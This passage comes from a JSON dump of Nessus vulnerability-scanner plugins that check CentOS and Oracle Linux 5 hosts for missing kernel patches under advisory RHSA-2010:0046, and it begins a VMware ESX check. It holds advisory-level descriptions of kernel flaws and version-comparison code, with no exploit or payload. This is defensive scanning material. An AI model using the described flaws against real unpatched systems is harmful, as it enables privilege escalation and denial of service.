flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-164.11.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:59", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user could send a specially crafted IOCTL request that would cause a denial of service or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on memory, fuse_put_request() could dereference an invalid pointer, possibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243 update introduced two flaws in the routing implementation. If an attacker was able to cause a large enough number of collisions in the routing hash table (via specially crafted packets) for the emergency route flush to trigger, a deadlock could occur. Secondly, if the kernel routing cache was disabled, an uninitialized pointer would be left behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the do_coredump() function. A local attacker able to guess the file name a process is going to dump its core to, prior to the process crashing, could use this flaw to append data to the dumped core file. This issue only affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable set to 2, the core file will not be recorded if the file already exists. For example, core files will not be overwritten on subsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems, 32-bit processes could access and read certain 64-bit registers by temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV) support in the qla2xxx driver, resulting in two new sysfs pseudo files, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'. These two files were world-writable by default, allowing a local user to change SCSI host attributes. This flaw only affects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The 'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/') had world-writable permissions. This could allow local, unprivileged users to change the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver used for OHCI compliant IEEE 1394 controllers. A local, unprivileged user with access to /dev/fw* files could issue certain IOCTL calls, causing a denial of service or privilege escalation. The FireWire modules are blacklisted by default, and if enabled, only root has access to the files noted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the HFS file system implementation. This could lead to a denial of service if a user browsed a specially crafted HFS file system, for example, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from www.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update / index.html\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2010-0046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44096", "published": "2010-01-21T00:00:00", "title": "CentOS 5 : kernel (CESA-2010:0046)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0046 and \n# CentOS Errata and Security Advisory 2010:0046 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44096);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_bugtraq_id(36576, 37019, 37068, 37069, 37339, 37806);\n script_xref(name:\"RHSA\", value:\"2010:0046\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2010:0046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user\ncould send a specially crafted IOCTL request that would cause a denial\nof service or, possibly, privilege escalation. (CVE-2009-3080,\nImportant)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer,\npossibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to\nleverage a use-after-free of locked, asynchronous file descriptors to\ncause a denial of service or privilege escalation. (CVE-2009-4141,\nImportant)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an\nattacker was able to cause a large enough number of collisions in the\nrouting hash table (via specially crafted packets) for the emergency\nroute flush to trigger, a deadlock could occur. Secondly, if the\nkernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing,\ncould use this flaw to append data to the dumped core file. This issue\nonly affects systems that have '/proc/sys/fs/suid_dumpable' set to 2\n(the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With\nsuid_dumpable set to 2, the core file will not be recorded if the file\nalready exists. For example, core files will not be overwritten on\nsubsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910,\nModerate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo\nfiles, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and\n'vport_delete'. These two files were world-writable by default,\nallowing a local user to change SCSI host attributes. This flaw only\naffects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The\n'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/')\nhad world-writable permissions. This could allow local, unprivileged\nusers to change the behavior of the driver. (CVE-2009-3889,\nCVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci\ndriver used for OHCI compliant IEEE 1394 controllers. A local,\nunprivileged user with access to /dev/fw* files could issue certain\nIOCTL calls, causing a denial of service or privilege escalation. The\nFireWire modules are blacklisted by default, and if enabled, only root\nhas access to the files noted above by default. (CVE-2009-4138,\nModerate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in\nthe HFS file system implementation. This could lead to a denial of\nservice if a user browsed a specially crafted HFS file system, for\nexample, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update\n/ index.html\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec445ac4\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016480.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fd6b72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-164.11.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:24", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2010:0046 :\n\nUpdated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user could send a specially crafted IOCTL request that would cause a denial of service or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on memory, fuse_put_request() could dereference an invalid pointer, possibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243 update introduced two flaws in the routing implementation. If an attacker was able to cause a large enough number of collisions in the routing hash table (via specially crafted packets) for the emergency route flush to trigger, a deadlock could occur. Secondly, if the kernel routing cache was disabled, an uninitialized pointer would be left behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the do_coredump() function. A local attacker able to guess the file name a process is going to dump its core to, prior to the process crashing, could use this flaw to append data to the dumped core file. This issue only affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable set to 2, the core file will not be recorded if the file already exists. For example, core files will not be overwritten on subsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems, 32-bit processes could access and read certain 64-bit registers by temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV) support in the qla2xxx driver, resulting in two new sysfs pseudo files, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'. These two files were world-writable by default, allowing a local user to change SCSI host attributes. This flaw only affects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The 'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/') had world-writable permissions. This could allow local, unprivileged users to change the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver used for OHCI compliant IEEE 1394 controllers. A local, unprivileged user with access to /dev/fw* files could issue certain IOCTL calls, causing a denial of service or privilege escalation. The FireWire modules are blacklisted by default, and if enabled, only root has access to the files noted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the HFS file system implementation. This could lead to a denial of service if a user browsed a specially crafted HFS file system, for example, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from www.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update / index.html\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2010-0046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67988", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2010-0046)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0046 and \n# Oracle Linux Security Advisory ELSA-2010-0046 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67988);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_bugtraq_id(36576, 37019, 37068, 37069, 37339, 37806);\n script_xref(name:\"RHSA\", value:\"2010:0046\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2010-0046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0046 :\n\nUpdated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user\ncould send a specially crafted IOCTL request that would cause a denial\nof service or, possibly, privilege escalation. (CVE-2009-3080,\nImportant)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer,\npossibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to\nleverage a use-after-free of locked, asynchronous file descriptors to\ncause a denial of service or privilege escalation. (CVE-2009-4141,\nImportant)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an\nattacker was able to cause a large enough number of collisions in the\nrouting hash table (via specially crafted packets) for the emergency\nroute flush to trigger, a deadlock could occur. Secondly, if the\nkernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing,\ncould use this flaw to append data to the dumped core file. This issue\nonly affects systems that have '/proc/sys/fs/suid_dumpable' set to 2\n(the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With\nsuid_dumpable set to 2, the core file will not be recorded if the file\nalready exists. For example, core files will not be overwritten on\nsubsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910,\nModerate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo\nfiles, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and\n'vport_delete'. These two files were world-writable by default,\nallowing a local user to change SCSI host attributes. This flaw only\naffects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The\n'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/')\nhad world-writable permissions. This could allow local, unprivileged\nusers to change the behavior of the driver. (CVE-2009-3889,\nCVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci\ndriver used for OHCI compliant IEEE 1394 controllers. A local,\nunprivileged user with access to /dev/fw* files could issue certain\nIOCTL calls, causing a denial of service or privilege escalation. The\nFireWire modules are blacklisted by default, and if enabled, only root\nhas access to the files noted above by default. (CVE-2009-4138,\nModerate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in\nthe HFS file system implementation. This could lead to a denial of\nservice if a user browsed a specially crafted HFS file system, for\nexample, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update\n/ index.html\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-January/001335.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:26:23", "bulletinFamily": "scanner", "description": "The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including remote code execution vulnerabilities, in several components and third-party libraries :\n\n - libpng\n - VMnc Codec\n - vmrun\n - VMware Remote Console (VMrc)\n - VMware Tools\n - vmware-authd", "modified": "2018-08-06T00:00:00", "id": "VMWARE_VMSA-2010-0009_REMOTE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=89740", "published": "2016-03-08T00:00:00", "title": "VMware ESX / ESXi Third-Party Libraries and Components (VMSA-2010-0009) (remote check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89740);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2006-6304\",\n \"CVE-2007-4567\",\n \"CVE-2009-0590\",\n \"CVE-2009-1377\",\n \"CVE-2009-1378\",\n \"CVE-2009-1379\",\n \"CVE-2009-1384\",\n \"CVE-2009-1386\",\n \"CVE-2009-1387\",\n \"CVE-2009-2409\",\n \"CVE-2009-2695\",\n \"CVE-2009-2908\",\n \"CVE-2009-2910\",\n \"CVE-2009-3080\",\n \"CVE-2009-3228\",\n \"CVE-2009-3286\",\n \"CVE-2009-3547\",\n \"CVE-2009-3556\",\n \"CVE-2009-3563\",\n \"CVE-2009-3612\",\n \"CVE-2009-3613\",\n \"CVE-2009-3620\",\n \"CVE-2009-3621\",\n \"CVE-2009-3726\",\n \"CVE-2009-3736\",\n \"CVE-2009-3889\",\n \"CVE-2009-3939\",\n \"CVE-2009-4020\",\n \"CVE-2009-4021\",\n \"CVE-2009-4138\",\n \"CVE-2009-4141\",\n \"CVE-2009-4212\",\n \"CVE-2009-4272\",\n \"CVE-2009-4355\",\n \"CVE-2009-4536\",\n \"CVE-2009-4537\",\n \"CVE-2009-4538\",\n \"CVE-2010-0001\",\n \"CVE-2010-0097\",\n \"CVE-2010-0290\",\n \"CVE-2010-0382\",\n \"CVE-2010-0426\",\n 